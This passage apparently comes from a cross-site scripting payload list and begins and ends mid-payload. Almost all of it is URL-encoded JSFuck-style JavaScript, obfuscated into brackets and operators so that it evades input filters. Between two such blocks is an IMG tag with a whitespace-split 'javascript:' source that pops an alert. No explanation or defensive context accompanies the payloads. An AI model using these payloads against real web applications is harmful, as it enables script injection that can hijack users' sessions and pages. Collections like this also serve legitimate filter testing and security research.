D%29%5B%2B%21%2B%5B%5D%5D%5D%5B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%28%2B%5B%5D%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%5D%28%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%29%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%21%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%2B%28%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%2B%5B%2B%21%2B%5B%5D%5D%29%29%5B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%2B%5B%5D%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%5B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%28%2B%5B%5D%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%5D%28%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%28%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%2B%5B%5D%5D%29%5B%28%5B%21%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%5B%21%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%28%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%21%5B%5D%2B%28%21%5B%5D%2B%5B%2B%5B%5D%5D%29%5B%28%5B%21%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%5B%21%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%28%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%29%28%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%28%29%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%2B%5B%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%5B%2B%5B%5D%5D%2B%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%29
<IMG SRC="jav   ascript:alert('XSS');">
%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%28%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%2B%5B%21%5B%5D%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%2B%28%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%29%29%5B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%2B%5B%5D%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%